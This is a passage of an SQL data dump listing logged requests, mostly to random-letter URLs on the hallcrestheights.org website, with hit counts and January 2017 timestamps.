03:10:29','0000-00-00 00:00:00'),(2776,'http://www.hallcrestheights.org/i20162628-wbwpbo-nkydhxjj-ikvf-vtzpx-bxkc-k47849-wjybtyl/',NULL,'','',1,0,'2017-01-08 03:14:01','0000-00-00 00:00:00'),(2777,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-k5250-eyooayi/kuks-szqce-baqdom-ytni-holbdent-i20162635-afymluze-xtlfgg.htm',NULL,'','',1,0,'2017-01-08 03:16:59','0000-00-00 00:00:00'),(2778,'http://www.hallcrestheights.org/lugdltrs-i20162635-mxxhy/k26150-pzqjllzo-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-08 03:17:43','0000-00-00 00:00:00'),(2779,'http://www.hallcrestheights.org/pcsc-k44182-qrufunp-i20162630-kwxpo-ideotw/tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo.htm',NULL,'','',1,0,'2017-01-08 03:19:14','0000-00-00 00:00:00'),(2780,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-eajanpdm-efnxhqf-i20162630-hjdyha-oxrcj-hwuvdsve-k59088-zytw-lcycws-cpua-kqnj.htm',NULL,'','',1,0,'2017-01-08 03:24:37','0000-00-00 00:00:00'),(2781,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-dpijaam-durtae-npggw-i20162632-k30828-tdvlxtdq-kunf-glqrhz-yonx-feqn.htm',NULL,'','',1,0,'2017-01-08 03:28:08','0000-00-00 00:00:00'),(2782,'http://www.hallcrestheights.org/k37488-dvisciw-bvwkuxkr-bzomsmvu-clzuphv-i20162630-qawuox-zmnpz-vsgcrlyc-mczo-qqelud-pwcm-egia.htm',NULL,'','',1,0,'2017-01-08 03:31:41','0000-00-00 00:00:00'),(2783,'http://www.hallcrestheights.org/bsoapa-i20162635-zapstasg-mhcq-cmckf-rdtf-k38849-kgpvbch/',NULL,'','',3,0,'2017-01-08 03:35:20','0000-00-00 00:00:00'),(2784,'http://www.hallcrestheights.org/k25608-ixnmuea-hwhiozhj-xbnwpgey-ooayiku-ksszqc-ebaqd-omytniho-lbde-i20162634-ntafym-luze-xtlf.htm',NULL,'','',1,0,'2017-01-08 03:42:16','0000-00-00 00:00:00'),(2785,'http://www.hallcrestheights.org/jglet-k43354-kymd-rqzn-rvmlkswa/zvkecqqn-eeiaqj-zlnpl-qfcneb-i20162636-xilnv.htm',NULL,'','',1,0,'2017-01-08 03:43:28','0000-00-00 00:00:00'),(2786,'http://www.hallcrestheights.org/k26250-ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-i20162635-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-08 03:44:13','0000-00-00 00:00:00'),(2787,'http://www.hallcrestheights.org/dvisciwb-vwkux-k26750-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-i20162635-gcrl-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-08 03:44:59','0000-00-00 00:00:00'),(2788,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-bzomsmvu-clzuphv-k51528-qawuox-zmnpz-i20162632-vsgcrlyc-mczo-qqelud-pwcm-egia.htm',NULL,'','',1,0,'2017-01-08 03:45:49','0000-00-00 00:00:00'),(2789,'http://www.hallcrestheights.org/jgletkym-drqzn-k15950-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-i20162635-nebx-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-08 03:46:30','0000-00-00 00:00:00'),(2790,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k36650-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-i20162635-uvds-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-08 03:47:14','0000-00-00 00:00:00'),(2791,'http://www.hallcrestheights.org/fadlajfn-k26650-lgfpc-vwgmyhde-cwxbdeu/dkov-fiibp-tquhzx-i20162635-chhr-mxagfpap.htm',NULL,'','',1,0,'2017-01-08 03:48:01','0000-00-00 00:00:00'),(2792,'http://www.hallcrestheights.org/jgle-tkymdrq-k44082-znrvm/lkswaz-vkecqqn-eeiaqjzl-i20162630-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-08 03:48:45','0000-00-00 00:00:00'),(2793,'http://www.hallcrestheights.org/mrcq-k22782-gbeifuw-grabt-nwyrqs/i20162630-emgwkow-hmemxgku-cybnpzk-icvejxku-lzjc-jkntsxjl-nuuuvtff.htm',NULL,'','',1,0,'2017-01-08 03:49:31','0000-00-00 00:00:00'),(2794,'http://www.hallcrestheights.org/ryvhrhmq-k56800-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-i20162634-xrcjhw-uvds-vezytwlc.htm',NULL,'','',1,0,'2017-01-08 03:50:17','0000-00-00 00:00:00'),(2795,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-cdcncxrd-hcpgzzd-llimvy-xjltf-k11028-eobkebwi-i20162633-vsmq-krfbml-kmst-howg.htm',NULL,'','',1,0,'2017-01-08 03:52:52','0000-00-00 00:00:00'),(2796,'http://www.hallcrestheights.org/k4620-gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-i20162632-pggwtd-vlxt-dqkunfgl-qrhzyonx-feqnzs.htm',NULL,'','',1,0,'2017-01-08 03:56:31','0000-00-00 00:00:00'),(2797,'http://www.hallcrestheights.org/i20162628-kzpffm-sxklrded-hwge-fvbbg-zagp-k48749-eciyyuw/',NULL,'','',1,0,'2017-01-08 03:59:56','0000-00-00 00:00:00'),(2798,'http://www.hallcrestheights.org/wbwpbonk-k28141-ydhx-jjikvfv-i20162633-tzpxbxkc-wjybtylw/',NULL,'','',1,0,'2017-01-08 04:03:30','0000-00-00 00:00:00'),(2799,'http://www.hallcrestheights.org/dvisciwb-vwkux-i20162628-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-k8940-ycmczoqq-eludpwcm-egiapx.htm',NULL,'','',1,0,'2017-01-08 04:10:32','0000-00-00 00:00:00'),(2800,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-i20162636-ephi-ijimj-njbo-k10049-gtsakbc/',NULL,'','',3,0,'2017-01-08 04:17:37','0000-00-00 00:00:00'),(2801,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx/i20162635-rdhcpgz-zdll-imvyx-k26550-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-08 04:19:51','0000-00-00 00:00:00'),(2802,'http://www.hallcrestheights.org/dvisc-iwbv/i20162632-wkux-krbzomsm-k31534-vuclzuph.htm',NULL,'','',1,0,'2017-01-08 04:20:36','0000-00-00 00:00:00'),(2803,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz-i20162629-k26149-qtqb-svjcwjb-xnmyvss/',NULL,'','',3,0,'2017-01-08 04:21:22','0000-00-00 00:00:00'),(2804,'http://www.hallcrestheights.org/gnfznxvj-xpalt-k15930-itjshkyj/yldpija-i20162636-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-08 04:22:07','0000-00-00 00:00:00'),(2805,'http://www.hallcrestheights.org/ixnmu-i20162636-eahw/hioz-hjxbnwpg-k43054-eyooayik.htm',NULL,'','',1,0,'2017-01-08 04:22:52','0000-00-00 00:00:00'),(2806,'http://www.hallcrestheights.org/oiyizg-i20162629-olrcmwfb/snop-k26099-dgfnh/',NULL,'','',1,0,'2017-01-08 04:23:38','0000-00-00 00:00:00'),(2807,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr/k25299-glnik-ghhm-i20162629-bbxpges-mrcaizt-biauw/',NULL,'','',1,0,'2017-01-08 04:25:08','0000-00-00 00:00:00'),(2808,'http://www.hallcrestheights.org/tkuykf-k61039-jdnjjbuc-yupa-jaylr/i20162632-lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj/',NULL,'','',1,0,'2017-01-08 04:25:53','0000-00-00 00:00:00'),(2809,'http://www.hallcrestheights.org/ixnmueah-whioz/k15650-hjxbnwpg-i20162635-eyooayi.htm',NULL,'','',3,0,'2017-01-08 04:26:40','0000-00-00 00:00:00'),(2810,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-i20162635-jveebikp-k36750-tjvlxf.htm',NULL,'','',3,0,'2017-01-08 04:27:24','0000-00-00 00:00:00'),(2811,'http://www.hallcrestheights.org/i20162637-mrcqgbei-k60040-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj.htm',NULL,'','',1,0,'2017-01-08 04:28:10','0000-00-00 00:00:00'),(2812,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf-rdtf-i20162633-k17789-kgpvbch/',NULL,'','',1,0,'2017-01-08 04:28:12','0000-00-00 00:00:00'),(2813,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k15600-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-i20162635-uhgfqvjd-clbbvz.htm',NULL,'','',1,0,'2017-01-08 04:28:57','0000-00-00 00:00:00'),(2814,'http://www.hallcrestheights.org/i20162636-lugdl-trsm/k43154-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-08 04:30:27','0000-00-00 00:00:00'),(2815,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-i20162632-lheliy-rqiy-qfufxvug-k5520-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-08 04:31:45','0000-00-00 00:00:00'),(2816,'http://www.hallcrestheights.org/k36300-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-wivsmqkr-i20162635-fbmlkmst-howgwh.htm',NULL,'','',1,0,'2017-01-08 04:42:20','0000-00-00 00:00:00'),(2817,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-i20162631-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx-k39720-feqnzs.htm',NULL,'','',1,0,'2017-01-08 04:45:52','0000-00-00 00:00:00'),(2818,'http://www.hallcrestheights.org/HH1108[1].pdf',NULL,'','',13,0,'2017-01-08 04:49:24','0000-00-00 00:00:00'),(2819,'http://www.hallcrestheights.org/xhajvqlw-i20162631-k62701-czbi-qsosqxo-qkgqaqyd-cptznzvt/',NULL,'','',3,0,'2017-01-08 04:49:24','0000-00-00 00:00:00'),(2820,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-k46920-dyhao-i20162632-xrcjhw-uvds-vezytwlc-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-08 04:52:57','0000-00-00 00:00:00'),(2821,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162628-vwgmyhde-cwxbdeu-dkov-fiibp-k29640-tquhzx-chhr-mxagfpap-uhgfqvjd-clbbvz.htm',NULL,'','',1,0,'2017-01-08 04:56:28','0000-00-00 00:00:00'),(2822,'http://www.hallcrestheights.org/vqjny-spvh-k21854-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-owtsxp-i20162636-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-08 04:57:45','0000-00-00 00:00:00'),(2823,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj-i20162629-k4749-npvz/',NULL,'','',1,0,'2017-01-08 04:58:31','0000-00-00 00:00:00'),(2824,'http://www.hallcrestheights.org/i20162637-upttmnbe-atgrb-nqcdcncx-rdhcpgz-k50340-zdll-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst-howgwh.htm',NULL,'','',1,0,'2017-01-08 05:00:00','0000-00-00 00:00:00'),(2825,'http://www.hallcrestheights.org/htxwhykr-k34981-svsv-hudykbq-xdosfiet-i20162634-yuaixnrb/',NULL,'','',4,0,'2017-01-08 05:03:35','0000-00-00 00:00:00'),(2826,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-k38100-tpmh-prbikzon-i20162635-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-08 05:07:05','0000-00-00 00:00:00'),(2827,'http://www.hallcrestheights.org/i20162630-nfrkopdo-k48301-bbum-golzesr-kwtzqtqb-svjcwjbx/',NULL,'','',3,0,'2017-01-08 05:10:40','0000-00-00 00:00:00'),(2828,'http://www.hallcrestheights.org/xhajvqlw-k55681-czbi-qsosqxo-qkgqaqyd-i20162634-cptznzvt/',NULL,'','',4,0,'2017-01-08 05:14:09','0000-00-00 00:00:00'),(2829,'http://www.hallcrestheights.org/dvisciwb-k5950-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-i20162635-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-01-08 05:15:11','0000-00-00 00:00:00'),(2830,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-k21804-dmefnxhq-fhjdyh-i20162636-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',1,0,'2017-01-08 05:15:56','0000-00-00 00:00:00'),(2831,'http://www.hallcrestheights.org/i20162628-htxwhy-krsvsvhu/dykb-qxdos-fiet-k58199-yuaixnr/',NULL,'','',1,0,'2017-01-08 05:16:41','0000-00-00 00:00:00'),(2832,'http://www.hallcrestheights.org/edzvd-lqco-k32034-mnnm-mcawvbfu/japyvrlf-lxhqjk-i20162632-uhkcm-umbhmg-znkoh-eyrupxp-udzikmu.htm',NULL,'','',1,0,'2017-01-08 05:17:27','0000-00-00 00:00:00'),(2833,'http://www.hallcrestheights.org/nfrkop-k24849-dobbumgo-lzes-rkwtz-qtqb-i20162629-svjcwjb-xnmyvss-sldjz/',NULL,'','',1,0,'2017-01-08 05:31:49','0000-00-00 00:00:00'),(2834,'http://www.hallcrestheights.org/jgletkym-drqzn-k15430-rvmlkswa/zvkecqq-i20162636-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-08 05:32:35','0000-00-00 00:00:00'),(2835,'http://www.hallcrestheights.org/mrcqgbei-k57700-fuwgr-abtnwyrq-semgwko-whme-mxgku-i20162634-cybnpz-kicv-ejxkulzj.htm',NULL,'','',1,0,'2017-01-08 05:33:22','0000-00-00 00:00:00'),(2836,'http://www.hallcrestheights.org/i20162637-dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-k49890-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm-egiapx.htm',NULL,'','',1,0,'2017-01-08 05:34:07','0000-00-00 00:00:00'),(2837,'http://www.hallcrestheights.org/k26950-vqjnyspv-holjp-eurrtpil/i20162635-uourxiv-lbtr-hnnmt-qzkowt.htm',NULL,'','',1,0,'2017-01-08 05:34:54','0000-00-00 00:00:00'),(2838,'http://www.hallcrestheights.org/xhajvq-k39249-lwczbiqs-osqx-i20162635-oqkgq-aqyd-cptznzv-tjqoevp-caqwj/',NULL,'','',1,0,'2017-01-08 05:35:20','0000-00-00 00:00:00'),(2839,'http://www.hallcrestheights.org/vqjnyspv-k6150-holjp-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-i20162635-kibkxnpf-ovpyay.htm',NULL,'','',1,0,'2017-01-08 05:35:37','0000-00-00 00:00:00'),(2840,'http://www.hallcrestheights.org/fadla-jfnl-k42354-gfpc/vwgmyhde-i20162636-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-08 05:37:10','0000-00-00 00:00:00'),(2841,'http://www.hallcrestheights.org/kzpffm-sxklrded-i20162632-hwge-fvbbg-zagp-eciyyuw-uvfztji-gjina-mzbcng-k60189-tfml/',NULL,'','',1,0,'2017-01-08 05:37:54','0000-00-00 00:00:00'),(2842,'http://www.hallcrestheights.org/gnfznxvj-k36730-xpalt-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-i20162636-dqkunfgl.htm',NULL,'','',1,0,'2017-01-08 05:38:40','0000-00-00 00:00:00'),(2843,'http://www.hallcrestheights.org/upttm-i20162636-nbea/tgrb-nqcdcncx-k21454-rdhcpgzz.htm',NULL,'','',1,0,'2017-01-08 05:39:28','0000-00-00 00:00:00'),(2844,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-i20162632-uourxivl-btrhnn-mtqzk-owtsxp-k32384-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-08 05:40:11','0000-00-00 00:00:00'),(2845,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg-i20162629-zagp-eciyyuw-k4549-uvfztji/',NULL,'','',3,0,'2017-01-08 05:41:00','0000-00-00 00:00:00'),(2846,'http://www.hallcrestheights.org/ryvhrh-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-haoxr-cjhwuvd-k34076-svezytw-i20162637-lcycws-cpuakqn-jtnp.htm',NULL,'','',1,0,'2017-01-08 05:41:41','0000-00-00 00:00:00'),(2847,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-i20162632-tquhzx-k46020-chhr-mxagfpap-uhgfqvjd-clbbvz.htm',NULL,'','',1,0,'2017-01-08 05:42:26','0000-00-00 00:00:00'),(2848,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb-wnsw-k40089-nsnjplp-i20162632-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy/',NULL,'','',1,0,'2017-01-08 05:42:26','0000-00-00 00:00:00'),(2849,'http://www.hallcrestheights.org/edzvdlqc-omnnm-i20162634-mcawvbfu/japyvrl-flxh-qjkuh-k57150-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-08 05:43:13','0000-00-00 00:00:00'),(2850,'http://www.hallcrestheights.org/i20162628-pcscqruf-k17740-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-08 05:43:59','0000-00-00 00:00:00'),(2851,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-terqb-wnswn-i20162629-k18405-snjplpf-trrj-ncypjoqw/',NULL,'','',1,0,'2017-01-08 05:45:58','0000-00-00 00:00:00'),(2852,'http://www.hallcrestheights.org/k16500-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc-i20162635-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-08 05:49:28','0000-00-00 00:00:00'),(2853,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-uvds-i20162634-k57450-vezytwlc-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-08 05:52:57','0000-00-00 00:00:00'),(2854,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-jaylr-lwfvd-i20162629-k16605-yruqpkl-sdef-hxdfpdfu/',NULL,'','',1,0,'2017-01-08 05:53:00','0000-00-00 00:00:00'),(2855,'http://www.hallcrestheights.org/i20162637-lugdltrs-mxxhy-k51240-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-cwqzhrib-nknyfeeb-sbjhfk.htm',NULL,'','',1,0,'2017-01-08 05:56:33','0000-00-00 00:00:00'),(2856,'http://www.hallcrestheights.org/oiyi-k37305-zgolrcm-wfbsnop-dgfnh-skrlj-i20162629-rgfctfz-fiwx-wmakoayo/',NULL,'','',1,0,'2017-01-08 06:03:43','0000-00-00 00:00:00'),(2857,'http://www.hallcrestheights.org/mrcqgbei-k15580-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-i20162636-ejxkulzj.htm',NULL,'','',1,0,'2017-01-08 06:06:47','0000-00-00 00:00:00'),(2858,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-cwqzhrib-i20162635-k37200-nknyfeeb-sbjhfk.htm',NULL,'','',1,0,'2017-01-08 06:07:08','0000-00-00 00:00:00'),(2859,'http://www.hallcrestheights.org/zmku-edtzjiv-yoqxi-fgxuhx/i20162630-ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik-zonm-tlajholj-k43482-rdkltsqw.htm',NULL,'','',1,0,'2017-01-08 06:07:28','0000-00-00 00:00:00'),(2860,'http://www.hallcrestheights.org/edzvdlqc-omnnm/k36350-mcawvbfu-i20162635-japyvrl.htm',NULL,'','',1,0,'2017-01-08 06:08:12','0000-00-00 00:00:00'),(2861,'http://www.hallcrestheights.org/vqjnys-k34126-pvholj/i20162637-peurrt-pilu-ourxiv.htm',NULL,'','',1,0,'2017-01-08 06:08:59','0000-00-00 00:00:00'),(2862,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-k25699-dykb/qxdos-i20162629-fiet-yuaixnr-bdggsaa/',NULL,'','',1,0,'2017-01-08 06:09:45','0000-00-00 00:00:00'),(2863,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-k36930-xptvuhm/iwnz-korpv-ubfgnq-tpmh-prbikzon-mtlajhol-i20162636-jrdklt.htm',NULL,'','',1,0,'2017-01-08 06:10:30','0000-00-00 00:00:00'),(2864,'http://www.hallcrestheights.org/zmkuedtz-jivyo-i20162628-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-k28740-prbikzon-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-08 06:10:42','0000-00-00 00:00:00'),(2865,'http://www.hallcrestheights.org/lugdlt-i20162637-rsmxxh/k33326-ypzqjl-lzoh.htm',NULL,'','',1,0,'2017-01-08 06:11:16','0000-00-00 00:00:00'),(2866,'http://www.hallcrestheights.org/fadlaj-fnlgfp/k54626-cvwgmy-i20162637-hdec-wxbdeu-dkovfi.htm',NULL,'','',1,0,'2017-01-08 06:12:01','0000-00-00 00:00:00'),(2867,'http://www.hallcrestheights.org/joifa/formmail/sabae_seminar.html',NULL,'','',3,0,'2017-01-08 06:12:46','0000-00-00 00:00:00'),(2868,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-i20162635-fvbbg-zagp-k38349-eciyyuw-uvfztji-gjina/',NULL,'','',1,0,'2017-01-08 06:13:32','0000-00-00 00:00:00'),(2869,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-i20162632-nplqfc-k26220-nebx-ilnvoxbd-jveebikp-tjvlxf.htm',NULL,'','',1,0,'2017-01-08 06:14:14','0000-00-00 00:00:00'),(2870,'http://www.hallcrestheights.org/cwhr-iwgpekz/i20162630-qdwkvum-k16595-zbsai/',NULL,'','',1,0,'2017-01-08 06:14:16','0000-00-00 00:00:00'),(2871,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-kecqqne/eiaqjz-k11478-lnplq-fcnebxil-i20162633-nvox-bdjvee-bikp-tjvl.htm',NULL,'','',1,0,'2017-01-08 06:15:03','0000-00-00 00:00:00'),(2872,'http://www.hallcrestheights.org/i20162632-k41984-lugdl-trsm-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-08 06:15:48','0000-00-00 00:00:00'),(2873,'http://www.hallcrestheights.org/i20162632-wbwpbo-nkydhxjj-ikvf-vtzpx-bxkc-k39789-wjybtyl-wosduie-qgwso/',NULL,'','',1,0,'2017-01-08 06:16:35','0000-00-00 00:00:00'),(2874,'http://www.hallcrestheights.org/k52734-mrcqg-beif-uwgr-abtnwyrq/semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk-i20162636-ntsxjln.htm',NULL,'','',1,0,'2017-01-08 06:16:57','0000-00-00 00:00:00'),(2875,'http://www.hallcrestheights.org/cwhriw-gpekzqdw/kvum-zbsai-i20162632-imjz-k39839-fozgdvd/',NULL,'','',1,0,'2017-01-08 06:17:18','0000-00-00 00:00:00'),(2876,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-i20162632-mnpzvs-gcrl-ycmczoqq-k25320-eludpwcm-egiapx.htm',NULL,'','',1,0,'2017-01-08 06:17:47','0000-00-00 00:00:00'),(2877,'http://www.hallcrestheights.org/zmku-edtzjiv-yoqxi/i20162628-fgxuhx-k26842-ptvuhmi-wnzkorpv-ubfgnqt.htm',NULL,'','',1,0,'2017-01-08 06:18:04','0000-00-00 00:00:00'),(2878,'http://www.hallcrestheights.org/i20162628-lugd-ltrsmxx/k27242-hypzq-jllzoh.htm',NULL,'','',1,0,'2017-01-08 06:18:49','0000-00-00 00:00:00'),(2879,'http://www.hallcrestheights.org/edzv-dlqcomn-k27042-nmmca-wvbfuj/apyvrlf-lxhqjkuh-kcmumbh-mgznkohe-i20162628-yrup-xpudzikm.htm',NULL,'','',1,0,'2017-01-08 06:19:35','0000-00-00 00:00:00'),(2880,'http://www.hallcrestheights.org/jgletky-k10828-mdrqznrv-mlkswazv-kecqqne-eiaqjz-i20162633-lnplq-fcnebxil-nvox-bdjvee.htm',NULL,'','',1,0,'2017-01-08 06:20:21','0000-00-00 00:00:00'),(2881,'http://www.hallcrestheights.org/cwhr-k17245-iwgpekz-i20162630-qdwkvum-zbsai-imjzf-ozgdvdd-qjvd-obknlykc-onedw/',NULL,'','',1,0,'2017-01-08 06:21:06','0000-00-00 00:00:00'),(2882,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-i20162631-gepla-lheliy-rqiy-k40620-qfufxvug-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-08 06:21:16','0000-00-00 00:00:00'),(2883,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-k47820-semgwko-whme-mxgku-i20162632-cybnpz-kicv-ejxkulzj-cjkntsxj-lnuuuv.htm',NULL,'','',1,0,'2017-01-08 06:24:49','0000-00-00 00:00:00'),(2884,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-rqiy-i20162634-qfufxvug-k57000-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-08 06:31:55','0000-00-00 00:00:00'),(2885,'http://www.hallcrestheights.org/i20162632-ixnmu-eahw-hioz/hjxbnwpg-k32134-eyooayik-uksszq-cebaq.htm',NULL,'','',1,0,'2017-01-08 06:34:45','0000-00-00 00:00:00'),(2886,'http://www.hallcrestheights.org/k17790-mrcqgbei-fuwgr-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-i20162628-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-08 06:35:29','0000-00-00 00:00:00'),(2887,'http://www.hallcrestheights.org/zmkued-tzjivy-k55026-oqxifg/xuhx-ptvuhm-i20162637-iwnzko-rpvub-fgnqtpm.htm',NULL,'','',1,0,'2017-01-08 06:36:19','0000-00-00 00:00:00'),(2888,'http://www.hallcrestheights.org/ixnm-ueahwhi/k10762-ozhjx-bnwpge-i20162634-yooayik.htm',NULL,'','',1,0,'2017-01-08 06:37:05','0000-00-00 00:00:00'),(2889,'http://www.hallcrestheights.org/zmkuedtz-k36280-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-i20162636-prbikzon.htm',NULL,'','',1,0,'2017-01-08 06:37:47','0000-00-00 00:00:00'),(2890,'http://www.hallcrestheights.org/yembjvht-i20162633-k7641-qqdc-kzfltzt-erqbwnsw-nsnjplpf-trrj-ncyp-joqwg/',NULL,'','',1,0,'2017-01-08 06:42:28','0000-00-00 00:00:00'),(2891,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr-i20162636-k22304-lycmc-zoqqelu-dpwcmeg-iapx.htm',NULL,'','',1,0,'2017-01-08 06:46:01','0000-00-00 00:00:00'),(2892,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-umbhmg-i20162636-k52184-znkoh-eyrupxp-udzikmu-sshe.htm',NULL,'','',1,0,'2017-01-08 06:49:33','0000-00-00 00:00:00'),(2893,'http://www.hallcrestheights.org/htxw-k17145-hykrsvs-vhudykb-qxdos-fiety-uaixnrb-i20162630-dggs-aarhefsk/',NULL,'','',1,0,'2017-01-08 06:53:06','0000-00-00 00:00:00'),(2894,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk-uhkcm-umbhmg-k52184-znkoh-eyrupxp-udzikmu-sshe.htm',NULL,'','',1,0,'2017-01-08 06:56:37','0000-00-00 00:00:00'),(2895,'http://www.hallcrestheights.org/fadla-jfnl/k10634-gfpc-i20162637-vwgmyhde-cwxbdeud-kovfii.htm',NULL,'','',1,0,'2017-01-08 06:59:46','0000-00-00 00:00:00'),(2896,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-jaylr-lwfvd-i20162629-k40005-yruqpkl-sdef-hxdfpdfu/',NULL,'','',1,0,'2017-01-08 07:00:08','0000-00-00 00:00:00'),(2897,'http://www.hallcrestheights.org/i20162637-mrcqg-k11134-beif-uwgr-abtnwyrq/semgwkow-hmemxg-kucyb-npzkic-vejxk.htm',NULL,'','',1,0,'2017-01-08 07:02:04','0000-00-00 00:00:00'),(2898,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-k52584-zvkecqqn-eeiaqj-i20162636-zlnpl-qfcneb-xilnv-oxbdjve.htm',NULL,'','',1,0,'2017-01-08 07:02:48','0000-00-00 